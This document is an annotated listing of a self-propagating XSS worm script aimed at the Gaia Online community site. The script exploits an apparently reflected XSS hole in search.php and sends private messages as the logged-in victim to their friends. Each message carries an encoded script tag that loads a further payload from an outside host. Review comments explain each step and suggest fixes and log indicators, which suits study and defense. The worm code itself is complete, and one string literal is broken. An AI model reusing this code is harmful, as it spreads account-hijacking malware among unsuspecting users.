Error!
-----------------
---End log.php---
-----------------
----start.js-----
// Page-rewrite step: the markup held in newContent replaces the contents of the
// element with id "content" in whatever page this script is running in.
// NOTE(review): in this capture the literal below is empty and broken across two
// lines, which is not valid JavaScript. Presumably the original HTML was stripped
// when the listing was archived -- confirm against another copy before drawing
// conclusions about what victims were shown.
var newContent = '
';
// The author labels this the "XSS vector": a URL prefix ending in the val= query
// parameter of search.php. Presumably val is written back into the search page
// without output encoding -- confirm against the server code. The defensive fix is
// to HTML-encode val wherever search.php echoes it.
var spreadOne = "http://www.gaiaonline.com/community/search.php?val="
// Overwrite the "content" element with newContent. No null check: this line throws
// if the page has no element with that id.
document.getElementById("content").innerHTML=newContent;
// Obtain an XMLHttpRequest object: the native constructor is tried first, and if
// that throws, a list of ActiveX ProgIDs is tried in order.
var xmlhttp;
try {
// Native constructor (the author lists Mozilla / Safari / IE7).
xmlhttp = new XMLHttpRequest();
} catch (e) {
// Fallback for IE builds without a native XMLHttpRequest: ProgIDs are listed from
// most specific to most generic, and the first one that instantiates is used.
var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',
'MSXML2.XMLHTTP.4.0',
'MSXML2.XMLHTTP.3.0',
'MSXML2.XMLHTTP',
'Microsoft.XMLHTTP' );
var success = false;
// The loop stops at the first ProgID that can be created (success flips to true).
for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {
try {
xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
success = true;
// Empty catch: a ProgID that cannot be created is skipped so the next one is tried.
} catch (e) {}
}
// No transport available: abort here, so none of the request code below runs.
if (!success) {
throw new Error('Unable to create XMLHttpRequest.');
}
}
// Relative URI, so it resolves against the origin of the page the script runs in.
// The request is therefore same-origin and the browser attaches the logged-in
// user's session cookies: the private message is sent as that user.
var targetURI = "/profile/privmsg.php";
// Form body for the private-message POST (mode=post, recipient, subject, folder,
// message). The message is a BBCode [url=...] link built from spreadOne plus a
// percent-encoded literal. Decoded, that literal is a quote and ">" that close the
// surrounding attribute and tag, a script element with the defer attribute whose
// src is //viewfor.site.com/astart.js, and an opening style tag. escape() encodes
// each "%" again, so the single-encoded form is what survives form decoding.
// NOTE(review): "friends@gaia" is presumably a site alias for the sender's friends
// list -- confirm; that is what would make the message self-propagating.
// For log review: requests to search.php whose val parameter contains an encoded
// script tag, and references to the host named above, are the indicators this
// listing yields.
var params = "mode=post&username=friends@gaia&subject=Check this out&folder=inbox&post=true&message=You should go check [url=" + spreadOne + escape('%22%3E%3Csc%72%69%70t%20defer%20%73%72%63%3D%2F/viewfor%2E%73%69%74%65%2E%63%6F%6D%2F%61%73%74%61%72%74%2E%6A%73%3E%3C/sc%72%69%70t%3E%3C%73%74%79%6C%65%3E') + "]this[/url] out.";
// Open an asynchronous (third argument true) POST to the message endpoint.
xmlhttp.open("POST", targetURI, true);
// Declare the body as a URL-encoded form, which is what makes the request look
// like an ordinary form submission to the server.
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
// Send the form body. No readystatechange handler is registered, so the response
// is never inspected. The endpoint accepts the POST on cookies alone as far as this
// script shows. A content security policy restricting script sources would block
// the external script load, and output encoding in search.php removes the entry
// point.
xmlhttp.send(params);
-----------------
--End start.js---